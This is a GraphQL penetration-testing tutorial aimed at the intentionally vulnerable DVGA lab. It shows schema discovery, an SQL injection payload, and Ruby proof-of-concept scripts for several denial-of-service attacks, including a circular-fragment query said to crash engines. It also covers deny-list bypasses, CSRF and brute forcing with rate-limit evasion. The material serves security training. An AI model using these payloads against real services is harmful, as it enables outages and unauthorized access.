Before attacking GraphQL hands-on, we need to understand what it is and how it works. That is the topic of the What is GraphQL? section.

Then, I’ll introduce Security considerations and give a glimpse of how some features can be abused.

Next, I’ll showcase several GraphQL vulnerabilities and attacks: how they work and how to exploit them, illustrated with PoCs.

Finally, I’ll present a few offensive tools.

What is GraphQL?

Quick history

Goals

GraphQL is a query language for APIs and a runtime engine for executing those queries.

It’s an alternative to API styles like REST, SOAP or gRPC. It’s not an absolute replacement: in some cases GraphQL is better suited, in others REST or gRPC are. Sometimes they coexist, and GraphQL can even be used on top of another API as an abstraction layer.

GraphQL doesn’t replace:

  • graph databases (Neo4j, ArangoDB, OrientDB)
  • query languages (SQL, NoSQL)
  • object-relational mapping (ORM) (Hibernate, CodeIgniter, SQLAlchemy, ActiveRecord)
  • state management libraries (Redux, Recoil, BLoC, Riverpod)

Key information

GraphQL is available for all major languages. It officially supports JavaScript, Go, PHP, Java / Kotlin, C# / .NET, Python, Swift / Objective-C, Rust, Ruby, Elixir, Scala, Flutter, Clojure, Haskell, C / C++, Elm, OCaml / Reason, Erlang, Julia, R, Groovy, Perl, D, Ballerina.

Query results are returned as JSON.

It is both a query language and a server-side API runtime.

Core concepts

  • Only ask for what you need
  • Get predictable results
  • Get many resources in a single request
  • Organized in terms of types and fields, not endpoints
  • Add new fields and types to a GraphQL API without impacting existing queries
  • Not limited by a specific storage engine
  • Real-time ready

Examples

Data description

type Project {
  name: String
  tagline: String
  contributors: [User]
}

Query

{
  project(name: "GraphQL") {
    tagline
  }
}

One can think of it as:

SELECT tagline FROM project WHERE name = 'GraphQL'

Answer

{
  "project": {
    "tagline": "A query language for APIs"
  }
}

Only what you need

One only needs the hero’s name?

{
  hero {
    name
  }
}

Just get the hero’s name.

{
  "hero": {
    "name": "Luke Skywalker"
  }
}

One needs the hero’s name and height?

{
  hero {
    name
    height
  }
}

Get exactly that.

{
  "hero": {
    "name": "Luke Skywalker",
    "height": 1.72
  }
}

With a REST API, one would probably have queried an endpoint that always returns the same fields, yielding either too much data or not enough.

GET /hero/0

{
  "name": "Luke Skywalker",
  "height": 1.72,
  "mass": 77,
  "address": "Galaxy du Centaure"
}

Many resources in a single request

It’s possible to query a user’s data, their posts and their followers in the same request.

query {
  User(id: 1337) {
    name
    posts {
      title
    }
    followers(last: 3) {
      name
    }
  }
}

{
  "data": {
    "User": {
      "name": "noraj",
      "posts": [
        { "title": "From cookie flag to DA" },
        { "title": "Why you shouldn't disable IPv6" }
      ],
      "followers": [
        { "name": "Alice" },
        { "name": "Bob" },
        { "name": "Carole" }
      ]
    }
  }
}

With REST, we would probably have to make three queries.

REST query n°1 to get user information.

GET /users/1337

{
  "user": {
    "id": 1337,
    "name": "noraj",
    "address": {...},
    "birthday": "30/02/1979"
  }
}

REST query n°2 to get user’s posts.

GET /users/1337/posts

{
  "posts": [{
    "id": 5542,
    "title": "From cookie flag to DA",
    "content": "...",
    "comments": [...]
  }, {
    "id": 5543,
    "title": "Why you shouldn't disable IPv6",
    "content": "...",
    "comments": [...]
  }]
}

REST query n°3 to get user’s followers.

GET /users/1337/followers

{
  "followers": [{
    "id": 1338,
    "name": "Alice",
    "address": {...},
    "birthday": "01/05/1979"
    },{
    "id": 1339,
    "name": "Bob",
    "address": {...},
    "birthday": "15/07/1978"
    },{...}]
}

In this case, GraphQL is a better fit than REST.

  • With REST:
    • 3 queries
    • too much data
  • With GraphQL:
    • 1 query
    • exact data

Security considerations

DVGA

To practice the following examples, deploy DVGA (Damn Vulnerable GraphQL Application), found on OWASP VWAD, which is an intentionally vulnerable application implementing many GraphQL vulnerabilities.

Installation steps:

$ git clone https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application.git dvga && cd dvga
$ docker build -t dvga .
$ docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 --name dvga dvga

We can define a custom local domain.

$ grep '\.test' /etc/hosts
127.0.0.2 noraj.test

To verify that the application is running correctly, let’s make an HTTP request to the GraphQL endpoint: curl http://noraj.test:5013/graphql.
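The same check can be scripted. Here is a minimal sketch that uses only Ruby's standard library (not the httpx gem used in the PoCs further down) to build a POST request carrying a trivial query. The helper name build_graphql_request is an assumption made for illustration, and the request is only built, not sent.

```ruby
require 'json'
require 'net/http'
require 'uri'

# Hypothetical helper: builds (but does not send) a GraphQL POST request.
def build_graphql_request(endpoint, query)
  request = Net::HTTP::Post.new(URI(endpoint))
  request['Content-Type'] = 'application/json'
  request.body = JSON.generate({ 'query' => query })
  request
end

request = build_graphql_request('http://noraj.test:5013/graphql', '{ __typename }')
puts request.body

# To actually send it (requires the DVGA container to be running):
# uri = URI('http://noraj.test:5013/graphql')
# response = Net::HTTP.start(uri.host, uri.port) { |http| http.request(request) }
# puts response.body
```

An answer containing a data key suggests the endpoint is alive and speaks GraphQL.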

Now let’s put the Escape Pentesting GraphQL 101 series into practice.

  1. Part 1 – Discovery
  2. Part 2 – Interaction
  3. Part 3 – Exploitation

Reconnaissance / Discovery

Doing some initial discovery steps allows:

  • Understanding the limits enforced
  • Determining the verbosity
  • Fetching all the information possible about the architecture

Before we start: Resources

It’s advisable to install a GraphQL client to ease interaction with the endpoint. For further reading or later use, consult or bookmark the following websites to search for tools and resources related to GraphQL security.

1st query / most basic operation

A very simple query is to ask for __typename: the answer reflects the type of operation being performed.

For example for a Query:

query {
  __typename
}

{
  "data": {
    "__typename": "Query"
  }
}

For a Mutation:

mutation {
  __typename
}

{
  "data": {
    "__typename": "Mutations"
  }
}

Note: a GraphQL mutation is roughly the equivalent of the POST, PUT, PATCH and DELETE methods in REST. It is used to create, update or delete content.

Aliases

Aliases can be used either to get a custom key name in the answer or to request the same field several times.

query {
  title1: __typename
  title2: __typename
  title3: __typename
  title4: __typename
  title5: __typename
}

{
  "data": {
    "title1": "Query",
    "title2": "Query",
    "title3": "Query",
    "title4": "Query",
    "title5": "Query"
  }
}

But for discovery, aliases have other uses:

  • Many aliases to detect an alias limit
  • A very long alias name to detect a character limit

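Both probes are easy to generate. The following sketch builds them as plain strings. The helper names and the probe sizes are arbitrary choices for illustration, not values from any tool.

```ruby
# Hypothetical helper: a query made of `count` aliases of __typename.
def alias_flood(count)
  aliases = (1..count).map { |i| "a#{i}: __typename" }
  "query { #{aliases.join(' ')} }"
end

# Hypothetical helper: a query with a single alias of `length` characters.
def long_alias(length)
  "query { #{'a' * length}: __typename }"
end

puts alias_flood(3)
puts long_alias(16)

# Arbitrary probe sizes: grow them until the server starts rejecting queries.
[10, 100, 1000].each do |n|
  puts "#{n} aliases -> #{alias_flood(n).length} characters"
end
```

Sending increasingly large probes and noting where the answers turn into errors gives an idea of the limits enforced.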
Detect verbosity

We can trigger an error on purpose to detect the error verbosity of the engine.

query {
  noraj
}

{
  "errors": [
    {
      "message": "Cannot query field \"noraj\" on type \"Query\".",
      "locations": [
        {
          "line": 2,
          "column": 3
        }
      ]
    }
  ]
}
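To compare verbosity between targets, the error answer can be summarised programmatically. This is a rough sketch: the helper name is hypothetical, and it only looks at the message, locations and extensions keys that the GraphQL specification defines for errors.

```ruby
require 'json'

# Hypothetical helper: summarises how much an error answer reveals.
def error_verbosity(response_body)
  errors = JSON.parse(response_body).fetch('errors', [])
  {
    messages: errors.map { |error| error['message'] },
    has_locations: errors.any? { |error| error.key?('locations') },
    has_extensions: errors.any? { |error| error.key?('extensions') }
  }
end

# Error answer taken from the example above, on a single line.
sample = <<~'JSON'
  {"errors":[{"message":"Cannot query field \"noraj\" on type \"Query\".","locations":[{"line":2,"column":3}]}]}
JSON

p error_verbosity(sample)
```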

Introspection

With gRPC, reflection can be enabled, which allows retrieving the protobuf definitions and listing services.

E.g. with grpcurl:

# Server supports reflection
grpcurl localhost:8787 list

With GraphQL there is no magic endpoint or query that returns the whole schema in one shot, but there is something similar called introspection, which returns a larger or smaller part of the schema depending on the complexity of the request.

Note: introspection may be enabled or disabled by default depending on the engine.

Here is a minimal example:

{
  __schema {
    queryType {
      fields {
        name
      }
    }
  }
}

introspection query answer
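Once the answer is received, listing the available queries is a matter of walking the JSON. A minimal sketch follows. The helper name is hypothetical, and the sample answer is a hand-written, abbreviated illustration, not a real dump of DVGA.

```ruby
require 'json'

# Hypothetical helper: names of the root query fields found in the answer
# to the minimal introspection query above.
def query_field_names(introspection_body)
  JSON.parse(introspection_body)
      .dig('data', '__schema', 'queryType', 'fields')
      .to_a
      .map { |field| field['name'] }
end

# Abbreviated, illustrative answer.
sample = <<~JSON
  {"data":{"__schema":{"queryType":{"fields":[
    {"name":"pastes"},{"name":"paste"},{"name":"readAndBurn"},{"name":"systemHealth"}
  ]}}}}
JSON

puts query_field_names(sample)
```

The same approach extends to mutationType, types and so on when a fuller introspection query is used.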

It’s possible to craft a more complex query to dump the nearly complete schema.

There are some "full" introspection queries to get all queries, mutations, fields, etc. This one is compatible with GraphQL Voyager.

full introspection query answer

It’s possible to judge the size of the answer by the size of the scrollbar. It’s nice to have such a complete answer, but it becomes too long to read manually.

Fortunately, tools such as GraphQL Voyager or GraphQL Visualizer render the schema as a graph, which is friendlier to the human brain.

Field suggestion

But a basic security measure is to disable introspection, so how can we get the schema when it is disabled?

It’s then possible to abuse error suggestions: did you mean.

In case of error, most engines will try to suggest the correct field based on the user’s input.

query {
  past
}

{
  "errors": [
    {
      "message": "Cannot query field \"past\" on type \"Query\". Did you mean \"paste\" or \"pastes\"?",
      "locations": [
        {
          "line": 3,
          "column": 2
        }
      ]
    }
  ]
}
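Harvesting the suggested names from such a message takes one regular expression. The sketch below assumes the message format shown above (double-quoted names after "Did you mean"). Other engines may word it differently, and the helper name is hypothetical.

```ruby
# Hypothetical helper: field names suggested in a "Did you mean" error message.
def suggested_fields(message)
  return [] unless message.include?('Did you mean')

  # Only keep the part after the hint, so the mistyped field is not returned.
  hint = message.split('Did you mean', 2).last
  hint.scan(/"([^"]+)"/).flatten
end

message = 'Cannot query field "past" on type "Query". Did you mean "paste" or "pastes"?'
p suggested_fields(message) # prints ["paste", "pastes"]
```

Repeating this with a wordlist of candidate names is the core idea behind automated schema recovery.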

Clairvoyance automates the extraction of a partial schema by brute-forcing field names and abusing field suggestions.

# uses the default wordlist; to set it explicitly, append:
# -w /usr/lib/python3.10/site-packages/clairvoyance/wordlist.txt
clairvoyance -o /tmp/dvga-schema.json http://noraj.test:5013/graphql

# /usr/share/seclists/Miscellaneous/lang-english.txt is too heavy,
# ~350k entries while default clairvoyance WL is ~10k

# english-words is ~5k entries
sudo -E wordlistctl fetch -d english-words
clairvoyance -o /tmp/dvga-schema.json http://noraj.test:5013/graphql \
 -w /usr/share/wordlists/misc/english-words.10.txt

# /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt
# is ~38k and full of garbage

# else build a custom wordlist

Finding paths

graphql-path-enum lists the different ways of reaching a given type in a GraphQL schema. This can reveal an indirect path to an object and thus a way to bypass restrictions.

$ graphql-path-enum -i /tmp/introspection-response.json -t OwnerObject
Found 3 ways to reach the "OwnerObject" node:
- Query (pastes) -> PasteObject (owner) -> OwnerObject
- Query (paste) -> PasteObject (owner) -> OwnerObject
- Query (readAndBurn) -> PasteObject (owner) -> OwnerObject
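To make the idea concrete, here is a rough sketch of such an enumeration: a depth-first walk over a schema that stops at types already visited. It is not how graphql-path-enum is implemented. The schema hash is a simplified, hand-written assumption based on the output above.

```ruby
# Simplified, hand-written schema (assumption): type => { field => returned type }.
SCHEMA = {
  'Query' => { 'pastes' => 'PasteObject', 'paste' => 'PasteObject', 'readAndBurn' => 'PasteObject' },
  'PasteObject' => { 'owner' => 'OwnerObject' },
  'OwnerObject' => { 'pastes' => 'PasteObject' }
}.freeze

# Depth-first enumeration of the paths from `type` to `target`.
# `visited` prevents looping on circular references.
def paths_to(target, type = 'Query', visited = [type], trail = [])
  SCHEMA.fetch(type, {}).flat_map do |field, returned|
    step = trail + ["#{type} (#{field})"]
    if returned == target
      [step + [target]]
    elsif visited.include?(returned)
      []
    else
      paths_to(target, returned, visited + [returned], step)
    end
  end
end

paths_to('OwnerObject').each { |path| puts "- #{path.join(' -> ')}" }
```

With this toy schema, the script prints the same three paths as the tool output above.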

Fingerprinting

Often the GraphQL endpoint will be /graphql or /v1/graphql. It’s generally not hard to find. Otherwise, graphw00f can try to detect the endpoint.

$ graphw00f -d -t http://noraj.test:5013
[*] Checking http://noraj.test:5013/
[*] Checking http://noraj.test:5013/graphql
[!] Found GraphQL at http://noraj.test:5013/graphql

Identifying the GraphQL engine:

$ graphw00f -f -t http://noraj.test:5013/graphql
[*] Checking if GraphQL is available at http://noraj.test:5013/graphql...
[!] Found GraphQL.
[*] Attempting to fingerprint...
[*] Discovered GraphQL Engine: (Graphene)
[!] Attack Surface Matrix: https://github.com/nicholasaleks/graphql-threat-matrix/blob/master/implementations/graphene.md
[!] Technologies: Python
[!] Homepage: https://graphene-python.org
[*] Completed.

Here graphw00f identified the Graphene engine:

graphene engine

Vulnerabilities

Multipath Evaluation

As an example, take the schema of DVGA and imagine that access to the character object is blocked.

DVGA schema

Five locations have to be blocked as well:

  • character query
  • characters query
  • results field of the characters object
  • resident field of the Location object
  • characters field of the Episode object

DVGA schema - character path

This is error-prone: if a single location is forgotten, the object remains reachable.

For example, on a website, a user is not authorized to view other users’ info (client object) but can access the client field of the comments object. This allows an authorization bypass.

SQL injection

GraphQL APIs often fetch data from a database.

Where to inject in order to detect a SQLi?

The only injectable inputs are arguments. One can think of them as a SQL WHERE clause.

query {
  user(name: "' or 1=1 --") {
    id
    email
  }
}
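When testing several payloads, quoting becomes the main source of mistakes. The sketch below relies on String#to_json to produce a properly escaped string literal for each payload. The payload list is illustrative, not exhaustive, and the user query with its name argument is simply the one from the example above.

```ruby
require 'json'

# Classic detection payloads (illustrative list).
PAYLOADS = ["'", "' or 1=1 --", '" or ""="'].freeze

# to_json returns a double-quoted, escaped literal, which is also
# a valid GraphQL string for these payloads.
def sqli_query(payload)
  "query { user(name: #{payload.to_json}) { id email } }"
end

PAYLOADS.each do |payload|
  # HTTP body to POST to the GraphQL endpoint.
  puts JSON.generate({ 'query' => sqli_query(payload) })
end
```

A difference in the answer (SQL error, more rows than expected, delay) between payloads hints at an injection.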

Denial of Service – Batch Query Attack (JSON array)

  1. Find a query that takes a long time to execute
  2. Batch it!

GraphQL query:

{
  systemUpdate
}

For example in DVGA, systemUpdate takes about 30 seconds to execute.

HTTP request:

POST /graphql HTTP/1.1
...
Content-Type: application/json

{"query":"{\n\tsystemUpdate\n}"}

The concept is to send several queries in the same request.

Most GraphQL clients don’t support batch queries: they often have a mode to select one query or another but won’t send both in the same HTTP JSON body. So one has to craft the HTTP request oneself.

Ruby PoC for batch querying:

require 'httpx'

data = Array.new(3) {
  { 'query' => 'query { systemUpdate }'}
}

HTTPX
  .plugin(:proxy)
  .with_proxy(uri: 'http://127.0.0.1:8080')
  .with(timeout: { operation_timeout: 120 })
  .post('http://noraj.test:5013/graphql', json: data)

The PoC:

  • queries systemUpdate 3 times
  • sends the request through the proxy for Burp logging
  • extends the timeout (default 60 sec) because systemUpdate takes ~32 sec and the PoC queries it 3 times, so it takes ~90 sec

The HTTP request body will look like:

[
  {
    "query": "query { systemUpdate }"
  },
  {
    "query": "query { systemUpdate }"
  },
  {
    "query": "query { systemUpdate }"
  }
]

Denial of Service – Deep recursion query attack

This attack is possible when there is a circular reference.

DVGA schema

The paste object can have an owner field and the owner object can have a paste field. The idea is just to nest them deeply.

DoS result

Writing the query by hand quickly becomes laborious, so scripting it is highly valuable.

Ruby PoC for deep recursion:

require 'httpx'

nesting_level = 10
recursion_pattern = 'pastes{owner{'
fields = 'name'
payload = recursion_pattern * nesting_level + fields + '}}' * nesting_level

data = { 'query' => "query{#{payload}}"}

HTTPX
  .plugin(:proxy)
  .with_proxy(uri: 'http://127.0.0.1:8080')
  .with(timeout: { operation_timeout: 120 })
  .post('http://noraj.test:5013/graphql', json: data)

DoS result

Denial of Service – Field duplication attack

As the title suggests, the attack concept is to duplicate the same field many times.

query {
  pastes {
    ipAddr # 1
    ipAddr # 2
    # ...
    ipAddr # 1000
  }
}

Unlike the previous attacks, each duplicated field is cheap to resolve, so several thousand fields are required to make the server hang significantly.

Ruby PoC for field duplication:

require 'httpx'

copy_level = 6000
copy_pattern = 'ipAddr,'
payload = copy_pattern * copy_level

data = { 'query' => "query{pastes{#{payload}}}"}

HTTPX
  .plugin(:proxy)
  .with_proxy(uri: 'http://127.0.0.1:8080')
  .with(timeout: { operation_timeout: 120 })
  .post('http://noraj.test:5013/graphql', json: data)

DoS result

Denial of Service – Query aliases duplication attack

It’s an alternative to the batch query attack when batching is disabled or not supported by the engine. Instead of creating several queries calling the same method, it uses only one query but uses aliases to call the same method several times.

query {
  q1: systemUpdate
  q2: systemUpdate
  q3: systemUpdate
}

Ruby PoC for query aliases duplication:

require 'httpx'

copy_level = 3
query = 'systemUpdate'
payload = (1..copy_level).map { |i| "q#{i}:#{query}" }.join(',')
data = { 'query' => "query{#{payload}}"}

HTTPX
  .plugin(:proxy)
  .with_proxy(uri: 'http://127.0.0.1:8080')
  .with(timeout: { operation_timeout: 120 })
  .post('http://noraj.test:5013/graphql', json: data)

Denial of Service – Circular fragments attack

The Spread operator (...) allows reusing fragments. It’s like a mixin.

Example of legitimate use:

fragment smallPaste on PasteObject {
  id
  title
  content
}
query allPastes {
  pastes {
    ...smallPaste
  }
}
query allPastesWithStatus {
  pastes {
    public
    ...smallPaste
  }
}

It’s easy to create an infinite loop by having two fragments call each other.

fragment noraj on PasteObject {
  title
  content
  ...jaron
}
fragment jaron on PasteObject {
  content
  title
  ...noraj
}
query {
  ...noraj
}

PS: the query may not even be needed.

Warning: use with caution during audits because some engines crash instantly when receiving it. It’s the most effective technique.
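The GraphQL specification requires that fragment spreads must not form cycles, so a compliant engine should reject such a document at validation time. The sketch below illustrates that check with a naive regex-based parser. It is an illustration under the assumption of flat fragments (no nested braces, no inline fragments), not a real GraphQL parser, and the helper names are hypothetical.

```ruby
# Maps each fragment name to the fragments it spreads (flat fragments only).
def fragment_spreads(document)
  document.scan(/fragment\s+(\w+)\s+on\s+\w+\s*\{([^}]*)\}/).to_h do |name, body|
    [name, body.scan(/\.\.\.\s*(\w+)/).flatten]
  end
end

# True when following the spreads from `name` leads back to a fragment on the stack.
def cyclic?(spreads, name, stack = [])
  return true if stack.include?(name)

  spreads.fetch(name, []).any? { |child| cyclic?(spreads, child, stack + [name]) }
end

def circular_fragments?(document)
  spreads = fragment_spreads(document)
  spreads.keys.any? { |name| cyclic?(spreads, name) }
end

attack = <<~GRAPHQL
  fragment noraj on PasteObject { title content ...jaron }
  fragment jaron on PasteObject { content title ...noraj }
  query { ...noraj }
GRAPHQL

puts circular_fragments?(attack)
```

Engines that skip this validation step are the ones likely to loop or crash.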

Query whitelist/blacklist bypass

Take the following direct query to systemHealth:

query {
  systemHealth
}

This query is protected and reserved for privileged users.

{
  "errors": [
    {
      "message": "400 Bad Request: Query is on the Deny List.",
      "locations": [
        {
          "line": 2,
          "column": 2
        }
      ],
      "path": [
        "systemHealth"
      ]
    }
  ],
  "data": {
    "systemHealth": null
  }
}

Sometimes just using a query with a different operation name can work.

query random {
  systemHealth
}

If not, a similar error is returned:

{
  "errors": [
    {
      "message": "400 Bad Request: Operation Name \"random\" is not allowed.",
      "locations": [
        {
          "line": 2,
          "column": 2
        }
      ],
      "path": [
        "systemHealth"
      ]
    }
  ],
  "data": {
    "systemHealth": null
  }
}

This technique allows bypassing blacklists but not whitelists.

To bypass a (poorly written) whitelist, use a query with an allowed operation name:

query getPastes {
  systemHealth
}

{
  "data": {
    "systemHealth": "System Load: 2.54\n"
  }
}

In some cases, a simple alias could also bypass filters.

query {
  bypass: systemHealth
}
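To see why such tricks can work, consider a hypothetical server-side filter that strips whitespace and compares the query with a fixed list. This is an assumption made for illustration, not the actual code of any engine or of DVGA.

```ruby
# Hypothetical naive deny list: exact match after stripping whitespace.
DENY_LIST = ['query{systemHealth}', '{systemHealth}'].freeze

def denied?(query)
  DENY_LIST.include?(query.gsub(/\s+/, ''))
end

candidates = {
  'direct' => 'query { systemHealth }',
  'operation name' => 'query random { systemHealth }',
  'alias' => 'query { bypass: systemHealth }'
}

candidates.each do |label, query|
  puts "#{label}: #{denied?(query) ? 'blocked' : 'passes'}"
end
```

Only the direct query is blocked here: any change to the query text defeats a string comparison, which is why filtering should be done on the parsed fields and not on the raw query.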

CSRF – POST-based

A common misconception is that JSON-based APIs are not vulnerable to CSRF.

But in fact it works all the same.

Create a classic CSRF form, convert the form data to JSON at submit time with JavaScript and use application/json as the content type, as it’s probably the only Content-Type accepted by the GraphQL engine. More occasionally, due to middleware, some endpoints may accept application/x-www-form-urlencoded as well.

Another option is to prepare a full JSON query in JavaScript and auto-submit it with fetch() or XHR.

Note: of course, CSRF attacks are mostly useful against mutations.

CSRF – GET-based

Misconfigured GraphiQL can authorize mutations over GET requests, so the CSRF is as easy as URL-encoding the whole query and putting the URL in an image or an iframe.

As queries are normally non-state changing, they are often authorized over GET, but if a state-changing GraphQL operation is misplaced in a query instead of a mutation, then it could be authorized over GET.
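Building such a URL is straightforward. In the sketch below, the deletePaste mutation and the helper names are hypothetical placeholders. Replace the operation with a state-changing operation that the target really exposes over GET.

```ruby
require 'uri'

# Hypothetical helper: GET URL carrying the whole operation in the query parameter.
def csrf_url(endpoint, operation)
  "#{endpoint}?#{URI.encode_www_form({ 'query' => operation })}"
end

# Hypothetical helper: image tag that fires the request when the page is rendered.
def csrf_img(endpoint, operation)
  %(<img src="#{csrf_url(endpoint, operation)}" alt="">)
end

# Placeholder operation (assumption, not a documented DVGA mutation).
operation = 'mutation { deletePaste(id: 1) { result } }'

puts csrf_url('http://noraj.test:5013/graphql', operation)
puts csrf_img('http://noraj.test:5013/graphql', operation)
```

The victim's browser sends the request along with its cookies as soon as the image or iframe is loaded, depending on the SameSite policy of those cookies.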

Tools

graphql-cop is a GraphQL vulnerability scanner.

graphql-cop example

CrackQL is a GraphQL password brute-force and fuzzing utility with the following features:

  • Defense evasion: evades traditional API HTTP rate-limit and query cost analysis defenses
  • Generic fuzzing (intruder like but benefits from defense evasion)

mutation {
  login(username: {{username|str}}, password: {{password|str}}) {
    accessToken
  }
}

crackql -t http://noraj.test:5013/graphql -q login.graphql -i usernames_and_passwords.csv

GraphQLmap is a scripting engine to interact with a GraphQL endpoint notably for:

  • field fuzzing
  • NoSQLi / SQLi

GraphQL Threat Matrix is a resource that lists the differences in how GraphQL implementations interpret and conform to the GraphQL specification.

graphql threat matrix

InQL is a CLI tool and Burp extension for GraphQL.

InQL example
InQL example
InQL example

About the author

Article written by Alexandre ZANNI aka noraj, Penetration Testing Engineer at ACCEIS.